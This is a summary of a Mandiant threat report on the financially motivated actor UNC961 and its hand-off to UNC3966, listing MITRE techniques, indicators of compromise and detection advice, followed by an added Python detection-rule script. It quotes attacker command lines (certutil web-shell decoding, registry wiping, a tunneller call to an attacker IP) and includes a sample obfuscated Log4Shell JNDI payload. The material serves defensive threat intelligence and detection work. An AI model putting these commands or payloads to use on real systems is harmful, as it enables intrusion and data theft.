UNC961 in the Multiverse of Mandiant: Three Encounters with a Financially Motivated Threat Actor | Mandiant

Mandiant describes three UNC961 intrusions (Dec 2021–Jul 2022) that leveraged publicly available exploit code against internet-facing applications (e.g., Log4Shell, JBoss CVE-2017-7504) to deploy shells, tunnellers, and backdoors, with one case involving an access hand-off to UNC3966 leading to data exfiltration. The report details payloads and tools such as HOLEPUNCH, HOLERUN, MUTEPUT, BLUEBEAM web shells, BARNWORK, LIGHTBUNNY and TURNSIGN, detection opportunities, and IOCs. #UNC961 #UNC3966 #MobileIron #HOLEPUNCH #HOLERUN #MUTEPUT #BLUEBEAM #BARNWORK #LIGHTBUNNY #TURNSIGN #CVE-2021-44228

Keypoints

  • UNC961 used publicly available exploit code against internet-facing servers (Log4Shell, Atlassian Confluence, JBoss CVE-2017-7504, Citrix ADC, WebLogic, GitLab) to gain initial access.
  • Initial payloads included non-interactive bash reverse shells and web-shells (Base64-encoded, decoded via certutil), enabling hands-on-keyboard activity under server processes like java.exe and Tomcat.
  • Post-exploitation tools deployed by UNC961 included the HOLEPUNCH tunneller, HOLEPUNCH-like SOCKS tunnellers, and the HOLERUN and MUTEPUT services; UNC3966 later deployed BARNWORK and LIGHTBUNNY and used WinSCP/SSH for exfiltration.
  • Detection opportunities included network egress strings (‘bash: no job control in this shell’), application logs containing JNDI exploit strings, java.exe spawning cmd/certutil, and suspicious Service/Scheduled Task/BITS activity.
  • UNC3966 performed extensive credential and domain discovery (LSASS dumps, DCSync, ntds.dit export, ADFind/ShareFinder) and compressed/exfiltrated NAS data with 7‑Zip and WinSCP over SSH.
  • Managed Defense containment and proactive hunting limited impact in two incidents; in the third, a delayed response necessitated extensive remediation (rebuilds, password resets, data scoping).

MITRE Techniques

  • [T1059.004] Command and Scripting Interpreter: Unix Shell – Used to establish bash TCP reverse shells; detection cue was the non-interactive shell message ( ‘bash: no job control in this shell’ )
  • [T1190] Exploit Public-Facing Application – Exploited JBoss CVE-2017-7504 and Log4Shell (CVE-2021-44228) for initial access ( ‘triggered CVE-2021-44228 by submitting the exploit into the application’s web portal login’ )
  • [T1505.003] Server Software Component: Web Shell – Wrote Base64-encoded web shells and deployed JSP web shells ( ‘echo > k.txt’ and resulting ‘httpil.jsp’ )
  • [T1140] Deobfuscate/Decode Files or Information – Used certutil to decode Base64-encoded web shell payloads ( ‘certutil -f -decode … k.txt … k.jspx’ )
  • [T1018] Remote System Discovery – Performed network connectivity checks via ping and nslookup ( ‘ping -n 1 119.9.3[.]198’ )
  • [T1069.001] Permission Groups Discovery: Local Groups – Enumerated local permission groups and users with net/user commands ( ‘net user’ )
  • [T1069.002] Permission Groups Discovery: Domain Groups – Queried domain group and trust information during discovery ( ‘nslookup /domain’ )
  • [T1016] System Network Configuration Discovery – Collected interface/config data via ipconfig ( ‘ipconfig /all’ )
  • [T1033] System Owner/User Discovery – Queried logged-on users using quser ( ‘quser’ )
  • [T1083] File and Directory Discovery – Used dir to enumerate file system contents ( 'dir c:\users' )
  • [T1105] Ingress Tool Transfer – Downloaded additional tooling via wget and BITS (URLs and Wget user-agent ‘Wget/1.11.4’ and BITS jobs logged)
  • [T1543.003] Create or Modify System Process: Windows Service – Installed persistence as Windows services (HOLERUN ‘wmhost’, MUTEPUT ‘WindowsNTApp’, TURNSIGN ‘WmiPrv’)
  • [T1053.005] Scheduled Task – Deployed tunneler/backdoor components as Scheduled Tasks (LIGHTBUNNY Task ‘MKSAuth’, BARNWORK Task ‘MKSAuth’)
  • [T1197] BITS Jobs – Used Windows BITS to retrieve payloads ( ‘Microsoft-Windows-Bits-Client/Operational’ EID 59 entries referencing ms-prod19-live[.]com )
  • [T1567] Exfiltration to Cloud Storage – Uploaded credential dumps and files to public file sharing services (uploaded LSASS dumps to ‘dropmefiles[.]com’)
  • [T1112] Modify Registry – Removed or altered Registry keys to cover tracks ( 'reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f' )
  • [T1070.007] Indicator Removal on Host: Timestomping/Registry – Deleted Registry MRU and typed paths to erase evidence (registry delete commands shown)
  • [T1047] Windows Management Instrumentation – Collected system info with wmic.exe ( 'wmic /node:"10.0.0.1" logicaldisk get deviceid,drivetype,…' )
  • [T1003.001] OS Credential Dumping: LSASS Memory – Dumped LSASS process memory via Task Manager (Taskmgr write ‘lsass.DMP’)
  • [T1560.001] Archive via 7‑Zip – Created compressed archives of NAS data with 7‑Zip before exfiltration (7zG.exe examples for Contracts and Accounting paths)
  • [T1048] Exfiltration Over Alternative Protocols – Transferred large volumes over SSH/WinSCP to remote IPs (WinSCP connections to ‘104.149.170[.]183:22’ and ‘23.227.203[.]214:22’)
  • [T1078.002] Valid Accounts: Domain Accounts – Used a compromised domain administrator account for RDP and lateral movement ( ‘using a compromised domain administrator account’ )
  • [T1021.001] Remote Services: RDP – Lateral movement via RDP sessions ( ‘moved laterally through the environment over Remote Desktop Protocol (RDP)’ )
  • [T1059.001] Command and Scripting Interpreter: PowerShell – Executed PowerShell from backdoor processes for script execution (PowerShell command example launching a .ps1 script)
  • [T1572] Protocol Tunneling – Employed tunneler tools wrapping custom protocols over SOCKS (LIGHTBUNNY and HOLEPUNCH/TURNSIGN usage described)
  • [T1059.003] Command and Scripting Interpreter: Windows Command Shell – Launched tunneler binaries via cmd.exe ( 'cmd.exe /c "C:\Users\Administrator\AppData\Local\Temp\vmtools.exe 37.1.209[.]20 443"' )
  • [T1135] Network Share Discovery – Used Invoke-ShareFinder/ShareFinder PowerShell to enumerate network shares ( ‘Invoke-ShareFinder’ and output files ‘sh.txt’ )
  • [T1003.006] OS Credential Dumping: DCSync – Evidence of Mimikatz DCSync usage for domain credential access ( ‘Mimikatz DCSync’ )
  • [T1003.003] OS Credential Dumping: NTDS.dit – Dumped Active Directory ntds.dit using ntdsutil (files ‘ntds.dit’ and registry hive dumps listed)
  • [T1136.002] Create Account: Domain Account – Created new domain user and added it to Domain Admins ( ‘created a new domain user account and added it to the Domain Admins’ )
  • [T1098] Account Manipulation – Modified domain privileges and accounts to maintain access (new domain admin account additions)
  • [T1569.002] System Services: Service Execution – Executed PsExec and installed services then removed them (PsExec service install and ‘sc delete psexesvc’)

Indicators of Compromise

  • [MD5 hash] Malware samples – c55f4b123c645f9c5a1d00205ab2e61e (LIGHTBUNNY), 31c49b87463f4e4ce6ae4c442319d3a2 (HOLERUN)
  • [IP address] Command-and-control / exfiltration endpoints – 104.149.170[.]183, 23.227.203[.]214 (WinSCP/SSH exfil targets), and 7 more IPs used for C2 and exploitation (e.g., 37.1.209[.]20, 107.181.187[.]184)
  • [Domain / URL] Download and DNS indicators – ms-prod19-live[.]com (BITS download URLs: ‘/rehjhj8785780923853/abc’, ‘/cdef’), intensive[.]int (nslookup activity) and file[.]io / dropmefiles[.]com used for tool/download hosting and upload
  • [File names] Deployed web shells and artifacts – httpil.jsp (BLUEBEAM web shell), k.txt / k.jspx (Base64-encoded web shell intermediate), HOW_DECRYPT.TXT (ransom note)
  • [Service / task names] Persistence artifacts – Windows service names ‘wmhost’, ‘WindowsNTApp’, ‘WmiPrv’ and scheduled task names ‘MKSAuth’, ‘MKS Update Tools’

UNC961 repeatedly used public exploit code to write and execute shells on vulnerable application servers: Log4Shell payloads logged to MobileIron Core spawned bash reverse shells (detected via the 'bash: no job control in this shell' network string), and JBoss deserialization (CVE-2017-7504) was used to echo Base64 payloads that were decoded with certutil into JSP web shells (k.txt → k.jspx → httpil.jsp). Operators performed discovery and persistence from those shells (ps / kill to remove other actors; net/quser/ipconfig/dir commands run under java.exe), then installed tunnellers or backdoors (HOLEPUNCH and HOLEPUNCH-like SOCKS tunnellers on both UNIX and Windows hosts, and later HOLERUN/MUTEPUT as Windows services) to maintain remote connectivity.

When web shells were present, adversaries executed sequences of actions: write Base64 payloads, decode to web-accessible files via certutil, run discovery commands (nslookup/ping/ipconfig/quser/net), and then stage additional tools via wget or BITS. In one incident UNC961 installed HOLERUN and MUTEPUT, later handing off access to UNC3966, which deployed BARNWORK and LIGHTBUNNY, used scheduled tasks and BITS/wget for persistence/downloads, dumped credentials (LSASS dumps, Mimikatz DCSync, ntds.dit via ntdsutil), compressed sensitive NAS data with 7‑Zip, and exfiltrated files over SSH with WinSCP to attacker-controlled IPs.

Detection and response opportunities include monitoring for non-interactive shell network strings (‘bash: no job control in this shell’), application logs containing JNDI exploit URIs, java.exe spawning cmd/certutil and writing Base64 files, suspicious BITS job entries referencing unfamiliar URLs, anomalous Wget user-agents, creation of unusual Windows services or scheduled tasks (service names and binary paths listed), large outbound SSH transfers, and registry deletions indicative of indicator removal. Containment actions that proved effective were isolating compromised servers, removing services/tasks, revoking/staggering credentials, rebuilding infected hosts, and enterprise password resets to prevent further lateral movement and ransomware deployment.
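The detection opportunities listed above can be turned into concrete rules run over normalised telemetry. The following is an added example, not Mandiant's code or tooling: it models events from a network sensor, application log, process telemetry, Windows event log and web proxy as dicts in an assumed schema (the field names are assumptions), and encodes the page's cues as rules. The BITS host allowlist and the sample events at the bottom are constructed; the Log4j lookup-unwrapping goes beyond the page by also catching the obfuscated `${${lower:j}ndi:...}` forms that plain string matching misses. Event IDs 7045 (service installed) and 106 (task registered) are standard Windows channels and are used here as additional persistence cues alongside the report's BITS EID 59.

```python
"""Detection rules for the UNC961/UNC3966 tradecraft summarised above.

Added example (not Mandiant's code). Events are dicts in an assumed
normalised schema; field names are assumptions, and SAMPLE_EVENTS at the
bottom are constructed so the rules can be exercised offline.
"""
import re
from urllib.parse import urlparse

# Assumed allowlist of hosts that BITS jobs may legitimately download from.
BITS_ALLOWED_HOSTS = {"download.windowsupdate.com", "updates.example.internal"}
# Service / scheduled task names taken from the report (lower-cased for matching).
KNOWN_BAD_SERVICES = {"wmhost", "windowsntapp", "wmiprv"}
KNOWN_BAD_TASKS = {"mksauth", "mks update tools"}

# Log4j resolves ${lower:x}, ${upper:x} and ${name:-x} before the jndi lookup,
# so "jndi" is often split across them in logs; strip the wrappers first.
_CASE_WRAPPER = re.compile(r"\$\{(?:lower|upper):([^{}$]*)\}", re.I)
_DEFAULT_WRAPPER = re.compile(r"\$\{[^{}/]*?:-([^{}$]*)\}")
_JNDI = re.compile(r"\$\{\s*jndi:(ldaps?|rmi|dns|iiop)://", re.I)


def normalise_log4j(text):
    """Unwrap Log4j lookup wrappers repeatedly until the text stops changing."""
    prev = None
    while prev != text:
        prev = text
        text = _CASE_WRAPPER.sub(r"\1", text)
        text = _DEFAULT_WRAPPER.sub(r"\1", text)
    return text


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(ev):
    """Return the rule ids that fire on one event (empty list if none)."""
    hits = []
    src = ev.get("source")
    if src == "network" and "bash: no job control in this shell" in ev.get("payload", ""):
        hits.append("reverse-shell-banner")       # non-interactive bash seen on egress
    elif src == "applog":
        if _JNDI.search(normalise_log4j(ev.get("message", ""))):
            hits.append("log4shell-jndi")          # JNDI lookup string in an application log
    elif src == "process":
        parent, image = _basename(ev.get("parent_image", "")), _basename(ev.get("image", ""))
        cmd = ev.get("command_line", "").lower()
        if (parent == "java.exe" or parent.startswith("tomcat")) and image in {"cmd.exe", "certutil.exe"}:
            hits.append("java-spawns-shell")       # web shell executing under the server process
        if image == "certutil.exe" and "-decode" in cmd:
            hits.append("certutil-decode")         # Base64 payload being decoded to disk
        if image == "reg.exe" and "delete" in cmd and "terminal server client" in cmd:
            hits.append("rdp-history-wipe")        # indicator removal of RDP connection history
    elif src == "winevent":
        chan, eid = ev.get("channel"), ev.get("event_id")
        if chan == "Microsoft-Windows-Bits-Client/Operational" and eid == 59:
            host = urlparse(ev.get("url", "")).hostname or ""
            if host not in BITS_ALLOWED_HOSTS:
                hits.append("bits-unknown-host")   # BITS job fetching from an unfamiliar URL
        if chan == "System" and eid == 7045:
            path = ev.get("image_path", "").lower()
            if ev.get("service_name", "").lower() in KNOWN_BAD_SERVICES or "\\appdata\\local\\temp\\" in path:
                hits.append("suspicious-service")  # known bad name or binary staged under Temp
        if chan == "Microsoft-Windows-TaskScheduler/Operational" and eid == 106:
            if ev.get("task_name", "").strip("\\").lower() in KNOWN_BAD_TASKS:
                hits.append("suspicious-task")
    elif src == "proxy" and ev.get("user_agent", "").startswith("Wget/"):
        hits.append("wget-user-agent")             # wget is rarely a legitimate client on Windows servers
    return hits


def scan(events):
    """Map each firing rule to the indexes of the events that triggered it."""
    report = {}
    for i, ev in enumerate(events):
        for rule in classify(ev):
            report.setdefault(rule, []).append(i)
    return report


# Constructed sample events; IPs and hosts are from the report or documentation ranges.
SAMPLE_EVENTS = [
    {"source": "network", "payload": "bash: no job control in this shell\n$ "},
    {"source": "applog", "message": 'POST /login user="${${lower:j}ndi:ldap://198.51.100.7:1389/a}"'},
    {"source": "applog", "message": "POST /login user=alice status=200"},
    {"source": "process", "parent_image": "C:\\app\\jre\\bin\\java.exe", "image": "C:\\Windows\\System32\\cmd.exe",
     "command_line": "cmd.exe /c certutil -f -decode k.txt k.jspx"},
    {"source": "process", "parent_image": "C:\\Windows\\System32\\cmd.exe", "image": "C:\\Windows\\System32\\certutil.exe",
     "command_line": "certutil -f -decode k.txt k.jspx"},
    {"source": "process", "parent_image": "C:\\Windows\\System32\\cmd.exe", "image": "C:\\Windows\\System32\\reg.exe",
     "command_line": 'reg delete "HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default" /va /f'},
    {"source": "winevent", "channel": "Microsoft-Windows-Bits-Client/Operational", "event_id": 59,
     "url": "http://ms-prod19-live.com/rehjhj8785780923853/abc"},
    {"source": "winevent", "channel": "Microsoft-Windows-Bits-Client/Operational", "event_id": 59,
     "url": "http://download.windowsupdate.com/c/msdownload/update/x.cab"},
    {"source": "winevent", "channel": "System", "event_id": 7045, "service_name": "wmhost",
     "image_path": "C:\\Users\\Administrator\\AppData\\Local\\Temp\\vmtools.exe"},
    {"source": "winevent", "channel": "Microsoft-Windows-TaskScheduler/Operational", "event_id": 106,
     "task_name": "\\MKSAuth"},
    {"source": "proxy", "user_agent": "Wget/1.11.4", "url": "http://file.io/PLACEHOLDER"},
]

if __name__ == "__main__":
    for rule, idx in sorted(scan(SAMPLE_EVENTS).items()):
        print(f"{rule:22s} events {idx}")
```

Each rule is deliberately narrow so a hit is reviewable on its own; in production the `java-spawns-shell` and `certutil-decode` rules would be joined on process ancestry, and the BITS allowlist would come from a baseline of the environment's normal download hosts rather than a hard-coded set.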

Read more: https://www.mandiant.com/resources/blog/unc961-multiverse-financially-motivated